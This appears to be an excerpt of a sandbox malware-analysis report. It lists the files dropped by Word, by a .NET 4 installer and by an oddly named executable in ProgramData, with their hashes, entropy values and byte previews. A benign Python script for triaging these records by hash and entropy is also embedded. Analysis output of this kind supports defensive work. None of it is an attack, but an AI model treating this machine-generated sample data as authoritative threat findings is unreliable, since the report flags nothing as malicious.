                                                                                                                                                                  Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/03/2023 17:52:45.882.WINWORD (0x1EE0).0x1F34.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2023-11-03T17:52:45.882Z","Contract":"Office.System.Activity","Activity.CV":"tNUwZHYt40SpUq5J0/Inuw.7.1","Activity.Duration":231,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...11/03/2023 17:52:45.897.WINWORD (0x1EE0).0x1F34.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":24,"Time":"2023-11-03T17:52:45.897Z","Contract":"Office.System.Activity","Activity.CV":"tNUwZHYt40SpUq5J0/Inuw.7","Activity.Duration":2733,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureD
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20971520
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                  MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                                                                  SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                                                                  SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                                                                  SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:ASCII text, with very long lines (632), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20971520
                                                                                                                                                                  Entropy (8bit):0.00868390162584169
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:m0bzTngviZg9UdkqfdAqFq/qeIXPo392il1AsBmKIKgcgsFBUH/J:RfTgaq9qH1lAy/O3/Aom7KgtmBkR
                                                                                                                                                                  MD5:BFBD2477C1A4202BA148BC8C5E09DB58
                                                                                                                                                                  SHA1:BAEDDE48B827A6FFFF350CD319091A2B997BD757
                                                                                                                                                                  SHA-256:852A472A14E9BE37E83C0B0E6DB58001380AE445CC7E00447172153EDFCBD35C
                                                                                                                                                                  SHA-512:56A5C70710458FBED37429B5BEFDF99F991A81F472127D92A537CB2F32201EF6D9FA887FF2873392E5F652555464F88FCDFFA1BDA56D4076A9242F8D19EFE1FB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/03/2023 17:52:48.052.WINWORD (0x1A88).0x1A10.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":24,"Time":"2023-11-03T17:52:48.052Z","Contract":"Office.System.Activity","Activity.CV":"/bO8wi0SMUW3XO84G28sUQ.7.1","Activity.Duration":181,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...11/03/2023 17:52:48.052.WINWORD (0x1A88).0x1A10.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":25,"Time":"2023-11-03T17:52:48.052Z","Contract":"Office.System.Activity","Activity.CV":"/bO8wi0SMUW3XO84G28sUQ.7","Activity.Duration":504,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureDi
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20971520
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                  MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                                                                  SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                                                                  SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                                                                  SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
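The dropped-file records listed here are tedious to triage by eye: several entries share a SHA-256 (the same content written to more than one path), and the 20 MiB WINWORD files with Entropy (8bit) 0.0 and SSDEEP 3:: are consistent with constant-filled, preallocated buffers rather than payloads. The script below is an added example written for this page, not part of the Joe Sandbox report or its tooling. It parses records in the key:value layout used above, collapses them by SHA-256, applies a coarse entropy-based triage label, and shows the 8-bit Shannon entropy computation behind the Entropy field. The sample input is copied from three of the records above with the MD5, SHA1, SHA-512 and Preview fields omitted; the function names, the labels and the 7.0 high-entropy threshold are this example's own assumptions.

```python
import hashlib
import math
from collections import defaultdict

# Constructed sample input: three records copied from the dropped-files
# listing above (MD5, SHA1, SHA-512 and Preview fields dropped for brevity).
SAMPLE_RECORDS = r"""
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):2190
Entropy (8bit):2.337646512799098
Encrypted:false
SSDEEP:24:EsqvOGLPYhLmW0VMFqVGRXOruJuNfb6q4LTsqFd:XqmG7YhyWUGerugNzXiTjd
SHA-256:CCB4ED10900D02FAC8BCF795ED7AE7D678408F25B3F12442D31ECD41E0208B9F
Malicious:false
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):2190
Entropy (8bit):2.337646512799098
Encrypted:false
SSDEEP:24:EsqvOGLPYhLmW0VMFqVGRXOruJuNfb6q4LTsqFd:XqmG7YhyWUGerugNzXiTjd
SHA-256:CCB4ED10900D02FAC8BCF795ED7AE7D678408F25B3F12442D31ECD41E0208B9F
Malicious:false
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):20971520
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
Malicious:false
"""


def parse_records(text: str) -> list[dict]:
    """Split the flat key:value listing into one dict per dropped file.
    A record starts at each 'Process:' line. Values are split on the first
    colon only, so 'C:\\...' paths and 'blocksize:hash:hash' SSDEEP values
    survive intact."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte, the quantity reported as 'Entropy (8bit)':
    0.0 for a constant-filled buffer, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def classify(record: dict) -> str:
    """Coarse triage label from the Size and Entropy fields alone (labels and
    the 7.0 threshold are this example's assumptions, not report semantics)."""
    size = int(record["Size (bytes)"])
    entropy = float(record["Entropy (8bit)"])
    if size > 0 and entropy == 0.0:
        return "constant-fill"   # every byte identical: preallocated/sparse, not a payload
    if entropy > 7.0:
        return "high-entropy"    # packed, compressed or encrypted content; inspect further
    return "low-entropy"


def summarize(text: str) -> dict:
    """Collapse content-identical drops: SHA-256 -> (copies seen, triage label)."""
    groups = defaultdict(list)
    for rec in parse_records(text):
        groups[rec["SHA-256"]].append(rec)
    return {sha: (len(recs), classify(recs[0])) for sha, recs in groups.items()}


def matches_zero_filled(record: dict) -> bool:
    """Test a constant-fill record against the SHA-256 of an all-zero buffer
    of the same size; True means the file is literally 20 MiB of 0x00."""
    size = int(record["Size (bytes)"])
    digest = hashlib.sha256(bytes(size)).hexdigest().upper()
    return digest == record["SHA-256"].upper()


if __name__ == "__main__":
    for sha, (copies, label) in summarize(SAMPLE_RECORDS).items():
        print(f"{sha[:16]}...  copies={copies}  {label}")
    big = [r for r in parse_records(SAMPLE_RECORDS) if r["Size (bytes)"] == "20971520"][0]
    print("20 MiB file is all zero bytes:", matches_zero_filled(big))
```

Grouping by SHA-256 rather than by path is what lets the same content written to several ~WRS or telemetry locations count once during triage; the entropy label only narrows where to look, and the SHA-256 comparison against a zero buffer is a cheap way to confirm what the 0.0 entropy and empty SSDEEP signature already suggest.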
                                                                                                                                                                  Process:C:\b53dd3b256ba71dad061693a386e\Setup.exe
                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16118
                                                                                                                                                                  Entropy (8bit):3.6434775915277604
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
                                                                                                                                                                  MD5:CD131D41791A543CC6F6ED1EA5BD257C
SHA1:F42A2708A0B42A13530D26515274D1FCDBFE8490
SHA-256:E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
SHA-512:A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
Malicious:false
Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

Process:C:\b53dd3b256ba71dad061693a386e\Setup.exe
File Type:HTML document, Unicode text, UTF-16, little-endian text, with very long lines (502), with CRLF line terminators
Category:dropped
Size (bytes):64690
Entropy (8bit):3.703036371687032
Encrypted:false
SSDEEP:384:fdsOT01KcBUFJFEWUxFzvHFknJCNoOxQEmG:fdsOTLyUFJFEWUxFzvltQ8
MD5:038267D078FC439278A5B2B37ACE608E
SHA1:CCF2147193F137A78296413FF5960CF2DFFF4B3B
SHA-256:5830F304DEBEAA123B059B995B48DA51770B1C28555F2CC44ED607242490AB2A
SHA-512:F5B34AC612CB764B08CEA7F7BE2A49C6E41CD29C0DC4AD8CE8F1436A7B41CDCC47B4E10991274457E519D2508988C568599C1B6A0E7C3A826ACE62297C22930D
Malicious:false
Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

Process:C:\b53dd3b256ba71dad061693a386e\Setup.exe
File Type:HTML document, Unicode text, UTF-16, little-endian text, with very long lines (388), with CRLF line terminators
Category:dropped
Size (bytes):52808
Entropy (8bit):3.7043651092385477
Encrypted:false
SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHj5hMznJCNoO:fdsOT01KcBUFJFEWUxFzvHFknJCNoO
MD5:81FB40A1E1149CD50834716278782E92
SHA1:15C0BE35802680892FD16B0A9C3E1FC5DDE4F271
SHA-256:762BD4C27C59267F807CAA547D5719B3CF20D289F977431E98639106C8B49B08
SHA-512:6DBA882CEED7897E216A76186497E845F520C2BBB49293526045F44C37A61B192394593B1714DC7CF492C18484CDB11A1BA847E0ED818176D16900EDF8D9819A
Malicious:false
Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

Process:C:\b53dd3b256ba71dad061693a386e\Setup.exe
File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 2057
Category:dropped
Size (bytes):723
Entropy (8bit):5.101748329011036
Encrypted:false
SSDEEP:12:MXdLOffQalGYT9Lu+30pfHw7Oo+FDDPOJD8zZi9LRJnVYsj+M28lIz2:MNifQallTv3MswTbY3jznIz2
MD5:64F07DCAFFD1516EEE785F9060C9079E
SHA1:14761003DB721312678C30FE43AF6AB09BF4597C
SHA-256:5C76A2F0825F1FB8D9DF89E7BC1EAD8545EE6BAB2FDDDA4672F0EF76B0EB1D7B
SHA-512:02FA34D04E24CF1D04084032EF3B8AF30622178150B3FC5C587A90DB92F98115E11851F5988A1925A105F2F0D31506E4C1E105147B720DFDAE4319DBBBE573BE
Malicious:false
Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang2057{\fonttbl{\f0\fnil\fcharset0 MS Shell Dlg 2;}}..\viewkind4\uc1\pard\ul\b\f0\fs23 Details\ulnone\b0\fs17\par..\par..\pard{\pntext\f0 1.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart1\pndec{\pntxta.}}..\li175 Microsoft .NET Framework 4 is already a part of this operating system. You do not need to install the .NET Framework 4 redistributable. \v <A HREF="http://go.microsoft.com/fwlink/?LinkId=164207">\v0 More information\v </A>\v0 . \par..\pard\li175\par..\pard{\pntext\f0 2.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart2\pndec{\pntxta.}}..\li175 Same or higher version of .NET Framework 4 Client Profile has already been installed on this computer.\par..\pard\par..\par..\par..}...

Process:C:\b53dd3b256ba71dad061693a386e\Setup.exe
File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 2057
Category:modified
Size (bytes):723
Entropy (8bit):5.101748329011036
Encrypted:false
SSDEEP:12:MXdLOffQalGYT9Lu+30pfHw7Oo+FDDPOJD8zZi9LRJnVYsj+M28lIz2:MNifQallTv3MswTbY3jznIz2
MD5:64F07DCAFFD1516EEE785F9060C9079E
SHA1:14761003DB721312678C30FE43AF6AB09BF4597C
SHA-256:5C76A2F0825F1FB8D9DF89E7BC1EAD8545EE6BAB2FDDDA4672F0EF76B0EB1D7B
SHA-512:02FA34D04E24CF1D04084032EF3B8AF30622178150B3FC5C587A90DB92F98115E11851F5988A1925A105F2F0D31506E4C1E105147B720DFDAE4319DBBBE573BE
Malicious:false
Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang2057{\fonttbl{\f0\fnil\fcharset0 MS Shell Dlg 2;}}..\viewkind4\uc1\pard\ul\b\f0\fs23 Details\ulnone\b0\fs17\par..\par..\pard{\pntext\f0 1.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart1\pndec{\pntxta.}}..\li175 Microsoft .NET Framework 4 is already a part of this operating system. You do not need to install the .NET Framework 4 redistributable. \v <A HREF="http://go.microsoft.com/fwlink/?LinkId=164207">\v0 More information\v </A>\v0 . \par..\pard\li175\par..\pard{\pntext\f0 2.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart2\pndec{\pntxta.}}..\li175 Same or higher version of .NET Framework 4 Client Profile has already been installed on this computer.\par..\pard\par..\par..\par..}...

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:CSV text
Category:dropped
Size (bytes):1024
Entropy (8bit):5.1658109182427445
Encrypted:false
SSDEEP:24:5jtavRecyB0MkjwVztjxOvXLK4FqLhjHIWtIjHU4I6:5jtavxCSwVztlOvu4gIWW3
MD5:3D5D79495DBD9AF2632E873F69AA71B3
SHA1:BC561435756D316E01617EA7032D4C2BE9483A42
SHA-256:CA663DAC6574385BFF4B987F2533F08E57B9B5F1E9BECD2F2BE040F613AC2117
SHA-512:998C9C8171C994C37F9E29C93FA0616A6C7F5810970CEA377BD678DF0608A3D00A47D3E02848D923B32D8CCB2F4A852DC96A0E7210B4F775E3997EA3D64F1E3E
Malicious:false
Preview:[11/3/2023, 18:52:21] === Logging started: 2023/11/03 18:52:21 ===..[11/3/2023, 18:52:21] Executable: C:\ProgramData\dotNetFx40_Client_setup.exe v4.0.30319.1..[11/3/2023, 18:52:21] --- logging level: standard ---..[11/3/2023, 18:52:22] Successfully bound to the ClusApi.dll..[11/3/2023, 18:52:22] Error 0x800706d9: Failed to open the current cluster..[11/3/2023, 18:52:22] Cluster drive map: ''..[11/3/2023, 18:52:22] Considering drive: 'C:\'.....[11/3/2023, 18:52:22] Considering drive: 'D:\'.....[11/3/2023, 18:52:22] Drive 'D:\' is rejected because of the unknown or unsuitable drive type..[11/3/2023, 18:52:22] Drive 'C:\' has been selected as the largest fixed drive..[11/3/2023, 18:52:22] Directory 'C:\b53dd3b256ba71dad061693a386e\' has been selected for file extraction..[11/3/2023, 18:52:22] Extracting files to: C:\b53dd3b256ba71dad061693a386e\..[11/3/2023, 18:52:23] Extraction took 1.453 seconds..[11/3/2023, 18:52:23] Executing command line: 'C:\b53dd3b256ba71dad061693a386e\\Setup.exe

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:GIF image data, version 89a, 15 x 15
Category:dropped
Size (bytes):663
Entropy (8bit):5.949125862393289
Encrypted:false
SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
MD5:ED3C1C40B68BA4F40DB15529D5443DEC
SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
Malicious:false
Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:GIF image data, version 89a, 15 x 15
Category:dropped
Size (bytes):663
Entropy (8bit):5.949125862393289
Encrypted:false
SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
MD5:ED3C1C40B68BA4F40DB15529D5443DEC
SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
Malicious:false
Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):3.8825771631647745
Encrypted:false
SSDEEP:3:oXB5VEi5Ty2oPxs5JMUmov5seLWRyUlYQ/8IQ:oXP6ahix/8n
MD5:97EAE05C69543B0DC12A64B705F02949
SHA1:87C10FC9E2F2DD64E4C7F0A640BF699C2FC9AFFC
SHA-256:E8572B1E50520B452AA652EBEAD298C8294DBE7DF1A1412E18E532AF02D55385
SHA-512:499F58E6B227C952042751348F44D3780AD483605FC07A4F389D3D59500319E653518AE2E6438907F3038E421B5B32889433CFCC9B1CE6808CB5D9F55E36BB7D
Malicious:false
Preview:..........................................................\pard\par..\par..\par..}...A>\v0 . \par..\pard\li175\par..\pard{\pntext\~.........).<.o.}..e....HZo..=.e

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):3.899098628086637
Encrypted:false
SSDEEP:3:oXB5VEi5Ty2oPxs5JMUmov5seLWRyZzX/LALtzqksYO:oXP6ahi6D0LtGksYO
MD5:516CBC88A1ABC5B8A3BA2368E3A0A681
SHA1:7677D168ADCE54FFB56FCC6618BA5302A65AD70B
SHA-256:7103ED9BB4B8B9F5DB8BBF7ACDBA0DE10963D631576686844CC63E22036A5E30
SHA-512:FF5F7D1F5B3DCE8D73E6E2973BD4184F77A8D06CF87065AA10709E788571691D00B32FDD45B9FD3C3B1FA10D7CE380AD7F86FB3DC9B4D40D03E7DF3814125FDE
Malicious:false
Preview:..........................................................\pard\par..\par..\par..}...A>\v0 . \par..\pard\li175\par..\pard{\pntext\~...........|...}..e.....V...=.e

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):30
Entropy (8bit):1.0370104374629148
Encrypted:false
SSDEEP:3:3tmZ:k
MD5:DDBACC583626C6638B1BEA8D4658B770
SHA1:7EDDF80646BD3897F995C64113525E74D442A4C1
SHA-256:A7F771CB1A062C607AF615FCC833E1FD880D294D4B44D59E872420081EC5D0C5
SHA-512:8E0BE39323A280BDD58635FB81ECE01CB34477BE09C0F40A79B2965FD95EF621C383EA24D1C1F174994180AC1A1C5075178133D733A3A00347D646ECE1748E97
Malicious:false
Preview:..............................

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:data
Category:modified
Size (bytes):12
Entropy (8bit):0.41381685030363374
Encrypted:false
                                                                                                                                                                  SSDEEP:3:/l:
                                                                                                                                                                  MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                                                  SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                                                  SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                                                  SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                  Entropy (8bit):0.41381685030363374
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:/l:
                                                                                                                                                                  MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                                                  SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                                                  SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                                                  SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............
                                                                                                                                                                  Process:C:\ProgramData\essam@sasa2023.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):136
                                                                                                                                                                  Entropy (8bit):5.077460406372576
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:qbFRiMImoQ/FERMQseY0xAe5aREQMMkL4+HrL+f:qbFYgtMY8t5afM4f
                                                                                                                                                                  MD5:CCAF353287921A93EF76A256CCAABBFA
                                                                                                                                                                  SHA1:30C36C28B79A1B6552FEEB1B2F15E7021371D06A
                                                                                                                                                                  SHA-256:5FDC70BCE93552FF2104BC38565E22D478E1BD29DC1C31C2E5621C459A81F717
